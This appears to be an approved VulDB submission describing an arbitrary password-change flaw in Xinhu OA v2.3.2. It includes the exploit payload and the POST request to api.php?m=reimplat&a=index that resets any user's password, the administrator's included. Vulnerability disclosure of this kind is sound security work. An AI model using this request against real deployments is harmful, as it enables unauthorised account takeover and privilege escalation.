| Field | Value |
|---|---|
| Title | Any user's password modification vulnerability in Xinhu OA V2.3.2 |
| Description | Xinhu OA v2.3.2 has a vulnerability in changing the password of any user in the frontend. An attacker can use this vulnerability to change the administrator password and successfully log in to the backend.<br>1. The payload generated to change the password is as follows:<br>The data passed in is `$data='{"msgtype":"editpass","user":"rock","pass":"123"}';`, where `user` is the username and `pass` is the password to be changed.<br>2. Send request package:<br>`POST /xinhu/api.php?m=reimplat&a=index HTTP/1.1`<br>31ae15.X3amdiGpSx5aZqNWaq6NSZVut2MjYWm5UqdTHn1OQWtPFrKuIalKTZGNW4g |
| Source | https://github.com/magicwave18/vuldb/issues/1 |
| User | magicwave18 (UID 52598) |
| Submission | 24/09/2023 12:47 PM (3 years ago) |
| Moderation | 29/09/2023 04:27 PM (5 days later) |
| Status | Approved |
| VulDB Entry | 240926 [Xinhu RockOA 1.1/2.3.2/15.X3amdi Password api.php?m=reimplat&a=index privilege escalation] |
| Points | 20 |